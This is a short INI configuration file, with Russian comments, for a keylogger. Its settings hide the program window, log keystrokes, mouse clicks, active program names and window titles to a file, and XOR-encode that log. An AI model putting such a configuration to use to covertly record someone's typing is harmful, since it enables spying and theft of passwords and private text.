[StartUp]
Show=01
;01 - показывать окно программы при запуске
;00 - скрывать.
Dir=C:\
;Директория где будет создан лог-файл
file=_Hook
;Имя лог-файла (не обязательно)
XorBase=85
;Чем ксорить
BufSize=255
;Размер буфера в байтах

[Options]
WriteBasicKey=01
; Записывать ли основные нажатые клавиши
WritePopKey=00
; Записывать ли подробно все нажимаемые клавиши
WritePushKey=00
; Записывать ли подробно все отпускаемае клавиши
WriteExeName=01
; Записывать ли имя файла программы с которой работает пользователь
WriteWindowName=01
; Записывать ли заголовок окна программы ---""---
AnsiToOem=00
; Преобразовывать ли в дос формат
RegardMouse=01
; Учитывать ли нажатия мышью
XorOutput=00
; Ксорить ли вывод
UseBuffer=01
; Использовать ли буфер


